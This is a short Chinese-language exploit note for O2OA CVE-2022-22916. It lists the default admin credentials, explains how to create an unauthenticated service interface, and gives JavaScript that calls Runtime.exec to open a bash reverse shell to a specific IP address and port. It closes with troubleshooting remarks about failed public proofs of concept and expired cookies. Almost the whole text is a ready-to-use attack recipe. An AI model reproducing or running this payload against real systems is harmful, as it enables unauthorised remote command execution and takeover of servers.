O2OA CVE-2022-22916
默认口令xadmin/o2
登录后台
进入服务管理
新建接口
var s = [3];
s[0] = "/bin/bash";
s[1] = "-c";
s[2] = "bash -i >& /dev/tcp/101.43.66.214/22496 0>&1";
var p = java.lang.Runtime.getRuntime().exec(s);
var sc = new java.util.Scanner(p.getInputStream(),"GBK").useDelimiter("\\A");
var result = sc.hasNext() ? sc.next() : "";
sc.close();
启用鉴权选择否
保存后执行即可
在github中有找到一些POC,直接抓包后发包,但是都失败了,所以建议使用上述方式直接执行命令
对于失败的原因,可能是由于cookie过期
在页面中对执行动作抓包
随后刷新页面在进行抓包,发现cookie已经发生了变化
参考:
https://wend1l.gitee.io/p/o2oa/